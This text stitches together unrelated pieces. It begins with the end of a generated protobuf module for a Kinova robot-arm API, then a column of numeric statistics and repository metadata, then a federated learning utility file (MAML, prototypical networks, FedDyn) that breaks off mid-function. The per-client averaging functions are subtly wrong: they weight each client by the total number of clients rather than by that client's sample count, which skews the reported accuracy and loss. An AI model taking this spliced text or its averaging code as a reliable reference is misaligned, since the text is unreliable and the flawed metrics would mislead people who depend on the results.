_sym_db.RegisterMessage(ActuatorFeedback)
ActuatorCustomData = _reflection.GeneratedProtocolMessageType('ActuatorCustomData', (_message.Message,), dict(
DESCRIPTOR = _ACTUATORCUSTOMDATA,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.ActuatorCustomData)
))
_sym_db.RegisterMessage(ActuatorCustomData)
BaseFeedback = _reflection.GeneratedProtocolMessageType('BaseFeedback', (_message.Message,), dict(
DESCRIPTOR = _BASEFEEDBACK,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.BaseFeedback)
))
_sym_db.RegisterMessage(BaseFeedback)
CustomData = _reflection.GeneratedProtocolMessageType('CustomData', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMDATA,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.CustomData)
))
_sym_db.RegisterMessage(CustomData)
Command = _reflection.GeneratedProtocolMessageType('Command', (_message.Message,), dict(
DESCRIPTOR = _COMMAND,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.Command)
))
_sym_db.RegisterMessage(Command)
Feedback = _reflection.GeneratedProtocolMessageType('Feedback', (_message.Message,), dict(
DESCRIPTOR = _FEEDBACK,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.Feedback)
))
_sym_db.RegisterMessage(Feedback)
_BASECYCLIC = _descriptor.ServiceDescriptor(
name='BaseCyclic',
full_name='Kinova.Api.BaseCyclic.BaseCyclic',
file=DESCRIPTOR,
index=0,
options=None,
serialized_start=2980,
serialized_end=3313,
methods=[
_descriptor.MethodDescriptor(
name='Refresh',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.Refresh',
index=0,
containing_service=None,
input_type=_COMMAND,
output_type=_FEEDBACK,
options=None,
),
_descriptor.MethodDescriptor(
name='RefreshCommand',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.RefreshCommand',
index=1,
containing_service=None,
input_type=_COMMAND,
output_type=Common__pb2._EMPTY,
options=None,
),
_descriptor.MethodDescriptor(
name='RefreshFeedback',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.RefreshFeedback',
index=2,
containing_service=None,
input_type=Common__pb2._EMPTY,
output_type=_FEEDBACK,
options=None,
),
_descriptor.MethodDescriptor(
name='RefreshCustomData',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.RefreshCustomData',
index=3,
containing_service=None,
input_type=_CUSTOMDATA,
output_type=_CUSTOMDATA,
options=None,
),
])
_sym_db.RegisterServiceDescriptor(_BASECYCLIC)
DESCRIPTOR.services_by_name['BaseCyclic'] = _BASECYCLIC
# @@protoc_insertion_point(module_scope)
| 50.567383
| 5,696
| 0.749522
| 7,082
| 51,781
| 5.201356
| 0.048009
| 0.064068
| 0.064991
| 0.049843
| 0.845342
| 0.817407
| 0.778695
| 0.754832
| 0.69052
| 0.668504
| 0
| 0.049562
| 0.128348
| 51,781
| 1,023
| 5,697
| 50.616813
| 0.766567
| 0.012881
| 0
| 0.716189
| 1
| 0.003074
| 0.236801
| 0.203515
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01127
| 0
| 0.01127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fcdfa7f3e1502005c313f265b98e40d4e28daf58
| 45,386
|
py
|
Python
|
utils_general.py
|
venkatesh-saligrama/Personalized-Federated-Learning
|
0ba79295d7c2e93bc9e2a37a6912bf005c4be698
|
[
"MIT"
] | 12
|
2021-07-23T07:50:19.000Z
|
2022-02-17T18:25:01.000Z
|
utils_general.py
|
venkatesh-saligrama/Personalized-Federated-Learning
|
0ba79295d7c2e93bc9e2a37a6912bf005c4be698
|
[
"MIT"
] | null | null | null |
utils_general.py
|
venkatesh-saligrama/Personalized-Federated-Learning
|
0ba79295d7c2e93bc9e2a37a6912bf005c4be698
|
[
"MIT"
] | 3
|
2021-07-12T03:57:55.000Z
|
2021-09-19T11:11:57.000Z
|
from utils_libs import *
from utils_dataset import *
from utils_models import *
# Global parameters
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
max_norm = 10
num_workers = 0
# --- Helper methods
weight = 0.8
def smooth_filter(arr): # Weight between 0 and 1
last = arr[0] # First value in the plot (first timestep)
smoothed = list()
for point in arr:
smoothed_val = last * weight + (1 - weight) * point # Calculate smoothed value
smoothed.append(smoothed_val) # Save it
last = smoothed_val # Anchor the last smoothed value
return smoothed
# Check if the model has NaN values
def is_model_NaN(model):
for name, param in model.named_parameters():
isNan = torch.sum(torch.isnan(param.data)).item()
if isNan > 0:
return True
return False
def get_mdl_params(model_list, n_par=0):
if n_par==0:
for name, param in model_list[0].named_parameters():
n_par += len(param.data.reshape(-1))
param_mat = torch.zeros((len(model_list), n_par), dtype=torch.float32, device=device)
for i, mdl in enumerate(model_list):
idx = 0
for name, param in mdl.named_parameters():
temp = param.data.detach().reshape(-1)
param_mat[i, idx:idx + len(temp)] = temp
idx += len(temp)
return param_mat
# --- Evaluate a NN model
def get_acc_loss(data_x, data_y, model, dataset_name, w_decay = 0):
acc_overall = 0; loss_overall = 0;
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
batch_size = min(3000, data_x.shape[0])
n_tst = data_x.shape[0]
tst_load = torch.utils.data.DataLoader(Dataset(data_x, data_y, dataset_name=dataset_name),
batch_size=batch_size, shuffle=False, num_workers=num_workers)
model.eval(); model = model.to(device)
with torch.no_grad():
for data in tst_load:
batch_x, batch_y = data[0].to(device), data[1].to(device)
y_pred = model(batch_x)
# Loss calculation
loss = loss_fn(y_pred, batch_y.reshape(-1).long())
loss_overall += loss.item()
# Accuracy calculation
y_pred = y_pred.cpu().numpy()
y_pred = np.argmax(y_pred, axis=1).reshape(-1)
batch_y = batch_y.cpu().numpy().reshape(-1).astype(np.int32)
batch_correct = np.sum(y_pred == batch_y)
acc_overall += batch_correct
loss_overall /= n_tst
if w_decay != 0:
# Add L2 loss
params = get_mdl_params([model]).cpu().numpy()
loss_overall += w_decay/2 * np.sum(params * params)
model.train()
return loss_overall, acc_overall / n_tst
def get_acc_loss_over_clients(data_x, data_y, model, dataset_name, w_decay = 0):
acc_ = 0; loss_ = 0; n_clnt = len(data_y); n_total = 0;
acc_list = np.zeros(n_clnt)
for idx in range(n_clnt):
loss_clnt, acc_clnt = get_acc_loss(data_x[idx], data_y[idx], model, dataset_name, w_decay)
loss_ += loss_clnt*len(data_y); acc_ += acc_clnt*len(data_y); n_total+=len(data_y)
acc_list[idx] = acc_clnt
acc_ = acc_ / n_total; loss_= loss_/ n_total
return loss_, acc_, np.max(acc_list), np.min(acc_list)
## MAML
def get_maml_acc_loss(data_x, data_y, model, model_func, learning_rate, num_grad_step, dataset_name, tst_x=False, tst_y=False, weight_decay_data=0, weight_decay_tst=False):
_model = model_func().to(device)
_model.load_state_dict(copy.deepcopy(dict(model.named_parameters())))
for params in _model.parameters():
params.requires_grad = True
optimizer_ = torch.optim.SGD(_model.parameters(), lr=learning_rate, weight_decay=weight_decay_data)
# Do Fine Tuning on all dataset
trn_load = torch.utils.data.DataLoader(Dataset(data_x, data_y, dataset_name=dataset_name),
batch_size=len(data_y), shuffle=False, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
_model.train(); _model = _model.to(device)
for _ in range(num_grad_step):
for data in trn_load:
batch_x, batch_y = data[0].to(device), data[1].to(device)
y_pred = _model(batch_x)
loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
optimizer_.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=_model.parameters(), max_norm=max_norm) # Clip gradients
optimizer_.step()
if isinstance(tst_x, bool):
# Get train acc
loss_, acc_ = get_acc_loss(data_x, data_y, _model, dataset_name, weight_decay_data)
else:
# Get test acc
weight_decay_tst = weight_decay_data if isinstance(weight_decay_tst, bool) else weight_decay_tst
loss_, acc_ = get_acc_loss(tst_x, tst_y, _model, dataset_name, weight_decay_tst)
del _model
return loss_, acc_
# Meta update and evaluate, Update based on train and evaluate based on test
def get_maml_acc_loss_over_clients(trn_x, trn_y, tst_x, tst_y, model_func, meta_learning_rate, meta_model, dataset_name, num_grad_step, w_decay = 0):
acc_ = 0; loss_ = 0; n_clnt = len(trn_x); n_total = 0;
acc_list = np.zeros(n_clnt)
for idx in range(n_clnt):
loss_clnt, acc_clnt = get_maml_acc_loss(data_x=trn_x[idx], data_y=trn_y[idx], model=meta_model, model_func=model_func,
learning_rate=meta_learning_rate, num_grad_step=num_grad_step,
dataset_name=dataset_name, tst_x=tst_x[idx], tst_y=tst_y[idx],
weight_decay_data=w_decay)
loss_ += loss_clnt*len(tst_y); acc_ += acc_clnt*len(tst_y); n_total+=len(tst_y)
acc_list[idx] = acc_clnt
acc_ = acc_ / n_total; loss_= loss_/ n_total
return loss_, acc_, np.max(acc_list), np.min(acc_list)
## Proto
def get_proto_acc_loss(data_x, data_y, model, model_func, dataset_name, tst_x=False, tst_y=False, weight_decay=0):
# Get one hot vectors for the labels
unique, unique_indices = np.unique(data_y.reshape(-1), return_inverse=True)
data_y_one_hot = np.zeros((len(data_x), np.max(unique_indices) + 1))
data_y_one_hot[np.arange(len(data_x)), unique_indices] = 1
trn_load = torch.utils.data.DataLoader(Dataset(data_x, data_y_one_hot, dataset_name=dataset_name),
batch_size=len(data_x), shuffle=False, num_workers=num_workers)
model = model.to(device)
model.proto = True
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
if isinstance(tst_x, bool):
tst_x = data_x; tst_y_one_hot = data_y_one_hot
else:
unique, unique_indices = np.unique(tst_y.reshape(-1), return_inverse=True)
tst_y_one_hot = np.zeros((len(tst_x), np.max(unique_indices) + 1))
tst_y_one_hot[np.arange(len(tst_x)), unique_indices] = 1
tst_load = torch.utils.data.DataLoader(Dataset(tst_x, tst_y_one_hot, dataset_name=dataset_name),
batch_size=len(tst_x), shuffle=False, num_workers=num_workers)
with torch.no_grad():
for data in trn_load:
batch_trn_x, batch_trn_y = data[0].to(device), data[1].to(device)
for data in tst_load:
batch_tst_x, batch_tst_y = data[0].to(device), data[1].to(device)
feature_space_sampl = model(batch_trn_x)
feature_space_query = model(batch_tst_x)
logits_cen = get_logits_proto_cen(feature_space_sampl, batch_trn_y, feature_space_query)
loss_proto = (loss_fn(logits_cen, torch.argmax(batch_tst_y, 1).reshape(-1).long()) / list(batch_tst_y.size())[0]).item()
acc = np.mean(np.argmax(logits_cen.cpu().numpy(), axis=1) == np.argmax(batch_tst_y.cpu().numpy(), axis=1))
model.proto = False
return loss_proto, acc
# Meta update and evaluate, Update based on train and evaluate based on test
def get_proto_acc_loss_over_clients(trn_x, trn_y, tst_x, tst_y, model_func, meta_model, dataset_name, w_decay = 0):
acc_ = 0; loss_ = 0; n_clnt = len(trn_x); n_total = 0
acc_list = np.zeros(n_clnt)
for idx in range(n_clnt):
loss_clnt, acc_clnt = get_proto_acc_loss(data_x=trn_x[idx], data_y=trn_y[idx], model=meta_model, model_func=model_func,
dataset_name=dataset_name,
tst_x=tst_x[idx], tst_y=tst_y[idx], weight_decay=w_decay)
loss_ += loss_clnt*len(tst_y); acc_ += acc_clnt*len(tst_y); n_total+=len(tst_y)
acc_list[idx] = acc_clnt
acc_ = acc_ / n_total; loss_= loss_/ n_total
return loss_, acc_, np.max(acc_list), np.min(acc_list)
# --- Helper for the printing and recording performance
def get_all_results_maml(meta_learning_rate, num_grad_step, clnt_x, clnt_y, tst_x, tst_y, dataset_name, model_func, avg_model, all_model, fast_exec, i):
print('Meta Lr: %f, Number of Gradient Steps: %d' %(meta_learning_rate, num_grad_step))
loss_1, acc_1, acc_1_max, acc_1_min = get_maml_acc_loss_over_clients(clnt_x, clnt_y, tst_x, tst_y, model_func, meta_learning_rate, avg_model, dataset_name, num_grad_step)
print("**** Communication sel %3d, Test Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_1, acc_1_max, acc_1_min, loss_1))
###
loss_2, acc_2, acc_2_max, acc_2_min = get_maml_acc_loss_over_clients(clnt_x, clnt_y, tst_x, tst_y, model_func, meta_learning_rate, all_model, dataset_name, num_grad_step)
print("**** Communication all %3d, Test Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_2, acc_2_max, acc_2_min, loss_2))
###
loss_3=0;acc_3=0;acc_3_max=0;acc_3_min=0
loss_4=0;acc_4=0;acc_4_max=0;acc_4_min=0
if not fast_exec:
loss_3, acc_3, acc_3_max, acc_3_min = get_maml_acc_loss_over_clients(clnt_x, clnt_y, clnt_x, clnt_y, model_func, meta_learning_rate, avg_model, dataset_name, num_grad_step)
print("**** Communication sel %3d, Cent Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_3, acc_3_max, acc_3_min, loss_3))
###
if not fast_exec:
loss_4, acc_4, acc_4_max, acc_4_min = get_maml_acc_loss_over_clients(clnt_x, clnt_y, clnt_x, clnt_y, model_func, meta_learning_rate, all_model, dataset_name, num_grad_step)
print("**** Communication all %3d, Cent Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_4, acc_4_max, acc_4_min, loss_4))
return [[loss_1, acc_1, acc_1_max, acc_1_min], [loss_2, acc_2, acc_2_max, acc_2_min], [loss_3, acc_3, acc_3_max, acc_3_min], [loss_4, acc_4, acc_4_max, acc_4_min]]
def get_all_results_plain(clnt_x, clnt_y, tst_x, tst_y, dataset_name, avg_model, all_model, fast_exec, i):
print('No Meta learning only global model')
loss_1, acc_1, acc_1_max, acc_1_min = get_acc_loss_over_clients(tst_x, tst_y, avg_model, dataset_name, w_decay = 0)
print("**** Communication sel %3d, Test Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_1, acc_1_max, acc_1_min, loss_1))
###
loss_2, acc_2, acc_2_max, acc_2_min = get_acc_loss_over_clients(tst_x, tst_y, all_model, dataset_name, w_decay = 0)
print("**** Communication all %3d, Test Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_2, acc_2_max, acc_2_min, loss_2))
###
loss_3=0;acc_3=0;acc_3_max=0;acc_3_min=0
loss_4=0;acc_4=0;acc_4_max=0;acc_4_min=0
if not fast_exec:
loss_3, acc_3, acc_3_max, acc_3_min = get_acc_loss_over_clients(clnt_x, clnt_y, avg_model, dataset_name, w_decay = 0)
print("**** Communication sel %3d, Cent Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_3, acc_3_max, acc_3_min, loss_3))
###
if not fast_exec:
loss_4, acc_4, acc_4_max, acc_4_min= get_acc_loss_over_clients(clnt_x, clnt_y, all_model, dataset_name, w_decay = 0)
print("**** Communication all %3d, Cent Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_4, acc_4_max, acc_4_min, loss_4))
return [[loss_1, acc_1, acc_1_max, acc_1_min], [loss_2, acc_2, acc_2_max, acc_2_min], [loss_3, acc_3, acc_3_max, acc_3_min], [loss_4, acc_4, acc_4_max, acc_4_min]]
def get_all_results_proto(clnt_x, clnt_y, tst_x, tst_y, dataset_name, model_func, avg_model, all_model, fast_exec, i):
print('Proto')
loss_1, acc_1, acc_1_max, acc_1_min = get_proto_acc_loss_over_clients(clnt_x, clnt_y, tst_x, tst_y, model_func, avg_model, dataset_name)
print("**** Communication sel %3d, Test Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_1, acc_1_max, acc_1_min, loss_1))
###
loss_2, acc_2, acc_2_max, acc_2_min = get_proto_acc_loss_over_clients(clnt_x, clnt_y, tst_x, tst_y, model_func, all_model, dataset_name)
print("**** Communication all %3d, Test Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_2, acc_2_max, acc_2_min, loss_2))
###
loss_3=0;acc_3=0;acc_3_max=0;acc_3_min=0
loss_4=0;acc_4=0;acc_4_max=0;acc_4_min=0
if not fast_exec:
loss_3, acc_3, acc_3_max, acc_3_min = get_proto_acc_loss_over_clients(clnt_x, clnt_y, clnt_x, clnt_y, model_func, avg_model, dataset_name)
print("**** Communication sel %3d, Cent Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_3, acc_3_max, acc_3_min, loss_3))
###
if not fast_exec:
loss_4, acc_4, acc_4_max, acc_4_min = get_proto_acc_loss_over_clients(clnt_x, clnt_y, clnt_x, clnt_y, model_func, all_model, dataset_name)
print("**** Communication all %3d, Cent Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(i+1, acc_4, acc_4_max, acc_4_min, loss_4))
return [[loss_1, acc_1, acc_1_max, acc_1_min], [loss_2, acc_2, acc_2_max, acc_2_min], [loss_3, acc_3, acc_3_max, acc_3_min], [loss_4, acc_4, acc_4_max, acc_4_min]]
# --- Train methods
def train_model(model, trn_x, trn_y, tst_x, tst_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
model.train(); model = model.to(device)
if print_per != 0:
print_test = not isinstance(tst_x, bool)
loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
if print_test:
loss_tst, acc_tst = get_acc_loss(tst_x, tst_y, model, dataset_name, 0)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Test Accuracy: %.4f, Loss: %.4f"
%(0, acc_trn, loss_trn, acc_tst, loss_tst))
else:
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f" %(0, acc_trn, loss_trn))
model.train()
k=0
while(k < K):
for data in trn_load:
batch_x, batch_y = data[0].to(device), data[1].to(device)
y_pred = model(batch_x)
loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
optimizer.step()
k += 1
if print_per != 0 and (k % print_per == 0):
loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
if print_test:
loss_tst, acc_tst = get_acc_loss(tst_x, tst_y, model, dataset_name, 0)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Test Accuracy: %.4f, Loss: %.4f"
%(k, acc_trn, loss_trn, acc_tst, loss_tst))
else:
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f"
%(k,acc_trn,loss_trn))
model.train()
if k == K:
break
# Freeze model
for params in model.parameters():
params.requires_grad = False
model.eval()
return model
def get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query):
size_sampl = len(feature_space_sampl) # S
size_query = len(feature_space_query) # Q
n_dim_feat = feature_space_sampl.shape[1] # D
assert len(feature_space_sampl) == len(curr_sampl_y), 'Error inconsistent input'
assert feature_space_sampl.shape[1] == feature_space_query.shape[1], 'Error inconsistent input'
feature_space_sampl_mean = torch.matmul(curr_sampl_y.T, feature_space_sampl) # CxS, SxD => CxD
feature_space_sampl_mean = feature_space_sampl_mean.div(torch.sum(curr_sampl_y, 0).reshape(-1,1))
# Distance Matrix Vectorization Trick
AB = torch.mm(feature_space_query, feature_space_sampl_mean.transpose(0, 1)) # QxD, DxC -> QxC
AA = (feature_space_query * feature_space_query).sum(dim=1, keepdim=True) # QxD, QxD -> Qx1
BB = (feature_space_sampl_mean * feature_space_sampl_mean).sum(dim=1, keepdim=True).reshape(1, -1) # CxD, CxD -> 1xC
dist_ = AA.expand_as(AB) - 2 * AB + BB.expand_as(AB) # QxC
logits = -1*dist_
return logits
def train_proto_model(model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
# Get one hot vectors for the labels
unique, unique_indices = np.unique(trn_y.reshape(-1), return_inverse=True)
trn_y_one_hot = np.zeros((n_trn, np.max(unique_indices) + 1))
trn_y_one_hot[np.arange(n_trn), unique_indices] = 1
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y_one_hot, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
model.train(); model = model.to(device); model.proto = True
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
k = 0
while(k < K):
# Get two batches of data, one as sample and one as query.
while True:
data_list = []
while len(data_list) != 2:
for data in trn_load:
data_list.append([data[0], data[1]])
if len(data_list) == 2:
break
# To get a meaningful loss, we need to have at least one sample in the sample set for all classes in query set
sampl_cls = np.unique(data_list[0][1]); query_cls = np.unique(data_list[1][1]); is_violated = False
for elem in query_cls:
if not elem in sampl_cls:
is_violated = True
if not is_violated:
break
# curr_sampl_y is BS x nCls. What if we do not have one class in the batch? That will make the loss NaN.
# make curr_sampl_y as BS x Current Classes
curr_sampl_y = data_list[0][1]; curr_query_y = data_list[1][1]
non_zero_classes = torch.where(torch.sum(curr_sampl_y, 0).reshape(-1,1) != 0)[0]
curr_sampl_y = curr_sampl_y[:,non_zero_classes].to(device)
curr_query_y = curr_query_y[:,non_zero_classes].to(device)
# Concatenate input
curr_sampl_x = data_list[0][0].to(device)
curr_query_x = data_list[1][0].to(device)
curr_x = torch.cat((curr_sampl_x, curr_query_x), 0)
feature_ = model(curr_x)
feature_space_sampl = feature_[:len(curr_sampl_x)]
feature_space_query = feature_[len(curr_sampl_x):]
# Get logits of query batch based on applying kNN to sample batch
logits_cen = get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query)
# Get negative log loss of the query class
loss = loss_fn(logits_cen, torch.argmax(curr_query_y, 1).reshape(-1).long()) / list(curr_query_y.size())[0]
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
###
optimizer.step()
k += 1
if print_per != 0 and (k % print_per == 0):
acc = np.mean(np.argmax(logits_cen.detach().cpu().numpy(), axis=1) == np.argmax(curr_query_y.cpu().numpy(), axis=1))
loss = loss.item()
print("Step %3d, Batch Acc: %.4f, Loss: %.4f" %(k, acc, loss))
model.proto = False
return model
def set_client_from_params(mdl, params):
dict_param = copy.deepcopy(dict(mdl.named_parameters()))
idx = 0
for name, param in mdl.named_parameters():
weights = param.data
length = len(weights.reshape(-1))
dict_param[name].data.copy_(params.data[idx:idx+length].reshape(weights.shape))
idx += length
mdl.load_state_dict(dict_param)
return mdl
###
def train_meta_model_MAML(model_func, model, trn_x, trn_y, num_grad_step, meta_learning_rate, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
model.train(); model = model.to(device)
n_par = len(get_mdl_params([model])[0])
optimizer_ = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
inner_opt = torch.optim.SGD(model.parameters(), lr=meta_learning_rate, weight_decay=weight_decay)
if print_per != 0:
loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Higher Library" %(0, acc_trn, loss_trn))
model.train()
for k in range(K):
data_list = []
while len(data_list) != 2:
for data in trn_load:
data_list.append([data[0], data[1]])
if len(data_list) == 2:
break
curr_trn_x, curr_trn_y = data_list[0][0].to(device), data_list[0][1].to(device)
curr_val_x, curr_val_y = data_list[1][0].to(device), data_list[1][1].to(device)
# Higher library
optimizer_.zero_grad()
with torch.backends.cudnn.flags(enabled=False):
with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=False) as (fnet, diffopt):
# Optimize the likelihood of the support set by taking
# gradient steps w.r.t. the model's parameters.
# This adapts the model's meta-parameters to the task.
# higher is able to automatically keep copies of
# your network's parameters as they are being updated.
for _ in range(num_grad_step):
trn_logits = fnet(curr_trn_x)
trn_loss = loss_fn(trn_logits, curr_trn_y.reshape(-1).long()) / list(curr_trn_y.size())[0]
diffopt.step(trn_loss)
# The final set of adapted parameters will induce some
# final loss and accuracy on the query dataset.
# These will be used to update the model's meta-parameters.
val_logits = fnet(curr_val_x)
val_loss = loss_fn(val_logits, curr_val_y.reshape(-1).long()) / list(curr_val_y.size())[0]
# Update the model's meta-parameters to optimize the query
# losses across all of the tasks sampled in this batch.
# This unrolls through the gradient steps.
val_loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
optimizer_.step()
if print_per != 0 and ((k+1) % print_per == 0):
loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f"
%((k+1), acc_trn, loss_trn))
model.train()
# Freeze model
for params in model.parameters():
params.requires_grad = False
model.eval()
return model
### FedDyn methods
####
def train_dyn_model(alpha, lambda_model, server_model, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
model.train(); model = model.to(device)
if print_per != 0:
loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, alpha: %.3f" %(0,acc_trn,loss_trn,alpha))
model.train()
k=0
while(k < K):
for data in trn_load:
batch_x, batch_y = data[0].to(device), data[1].to(device)
y_pred = model(batch_x)
optimizer.zero_grad()
loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
# FedDyn version!
# Add Dynamic loss
# Get model parameter
mld_pars = []
for name, param in model.named_parameters():
mld_pars.append(param.reshape(-1))
mld_pars = torch.cat(mld_pars)
loss_lambda = -torch.sum(mld_pars * lambda_model)
loss_server = -alpha*torch.sum(mld_pars * server_model) + alpha/2 * torch.sum(mld_pars*mld_pars)
loss = loss + loss_lambda + loss_server
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients to prevent exploding
optimizer.step()
k += 1
if print_per != 0 and (k % print_per == 0):
loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, alpha: %.3f" %(k,acc_trn,loss_trn,alpha))
model.train()
if k == K:
break
# Freeze model
for params in model.parameters():
params.requires_grad = False
model.eval()
return model
# ###
def train_dyn_meta_model_MAML(alpha, lambda_model, server_model, model_func, model, trn_x, trn_y, num_grad_step, meta_learning_rate, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
model.train(); model = model.to(device)
n_par = len(get_mdl_params([model])[0])
optimizer_ = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
inner_opt = torch.optim.SGD(model.parameters(), lr=meta_learning_rate, weight_decay=weight_decay)
if print_per != 0:
loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Higher Library, alpha %f" %(0, acc_trn, loss_trn, alpha))
model.train()
for k in range(K):
data_list = []
while len(data_list) != 2:
for data in trn_load:
data_list.append([data[0], data[1]])
if len(data_list) == 2:
break
curr_trn_x, curr_trn_y = data_list[0][0].to(device), data_list[0][1].to(device)
curr_val_x, curr_val_y = data_list[1][0].to(device), data_list[1][1].to(device)
# Higher library
optimizer_.zero_grad()
with torch.backends.cudnn.flags(enabled=False):
with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=False) as (fnet, diffopt):
# Optimize the likelihood of the support set by taking
# gradient steps w.r.t. the model's parameters.
# This adapts the model's meta-parameters to the task.
# higher is able to automatically keep copies of
# your network's parameters as they are being updated.
for _ in range(num_grad_step):
trn_logits = fnet(curr_trn_x)
trn_loss = loss_fn(trn_logits, curr_trn_y.reshape(-1).long()) / list(curr_trn_y.size())[0]
diffopt.step(trn_loss)
# The final set of adapted parameters will induce some
# final loss and accuracy on the query dataset.
# These will be used to update the model's meta-parameters.
val_logits = fnet(curr_val_x)
